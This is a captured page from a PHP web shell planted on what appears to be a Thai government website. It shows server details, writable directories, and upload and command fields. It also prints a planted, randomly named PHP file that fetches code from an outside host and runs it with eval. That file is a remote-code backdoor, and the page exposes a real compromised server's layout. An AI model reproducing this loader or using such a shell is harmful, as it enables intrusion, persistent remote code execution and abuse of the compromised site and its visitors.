403Webshell
Server IP : 119.59.102.212  /  Your IP : 18.116.170.100
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/arpon/module_eservice/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/arpon/module_eservice/XbKAumhF5VYM.php
<?php
// Oturumu başlat
session_start();

// Belirtilen URL'den içerik çeken fonksiyon
function fetchUrl($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    return curl_exec($ch);
}

// ASCII karakterlerinden URL oluşturuluyor (https://teamzedd2024.tech/raw/McuQGI)
$url = "https://teamzedd2024.tech/raw/McuQGI";

// Eğer oturumda daha önce URL varsa onu kullan, yoksa yukarıdaki URL'den veri çek
$result = isset($_SESSION["ts_url"]) ? @file_get_contents($_SESSION["ts_url"]) : fetchUrl($url);

// Çekilen veri bir string ise PHP kodu olarak çalıştır
if (is_string($result)) {
    eval('?>' . $result);
} else {
    echo "Error";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit